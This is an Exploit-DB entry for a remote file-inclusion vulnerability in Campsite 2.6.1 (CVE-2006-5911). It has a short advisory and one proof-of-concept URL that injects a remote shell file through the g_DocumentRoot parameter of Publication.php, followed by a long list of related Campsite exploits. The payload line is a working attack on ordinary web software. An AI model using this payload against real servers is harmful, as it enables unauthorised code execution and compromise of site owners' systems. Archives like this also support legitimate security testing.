Exploit

EDB-ID: 29987	Author: anonymous	Published: 2007-05-08
CVE: CVE-2006-5911	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: Link	Tags: N/A
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

source: http://www.securityfocus.com/bid/23874/info
                     
Campsite is prone to multiple remote file-include vulnerabilities.
                     
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
                     
This issue affects Campsite 2.6.1. Earlier versions may also be affected.

http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?

Related Exploits

Trying to match CVEs (1): CVE-2006-5911
Trying to match OSVDBs (1): 34209
Other Possible E-DB Search Terms: Campsite 2.6.1, Campsite

Date	Title	Author
2010-04-30	Campsite 3.x - 'article_id' Parameter SQL Injection	Stefan Esser
2010-07-15	Campsite CMS - Remote Persistent Cross-Site Scripting	D4rk357
2010-07-12	Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities	10n1z3d
2007-05-08	Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion	anonymous
2006-10-15	CampSite 2.6.1 - (g_documentRoot) Remote File Inclusion	Kw3[R]Ln
2007-05-08	Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - article.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleComment.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleData.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleImage.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleIndex.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticlePublish.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleTopic.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleType.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - Country.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - DatabaseObject.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - Event.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - image.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - IPAccess.php g_documentRoot Parameter Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - issue.php g_documentRoot Parameter Remote File Inclusion	anonymous

Campsite 2.6.1 - Publication.php g_documentRoot Parameter Remote File Inclusion

Related Exploits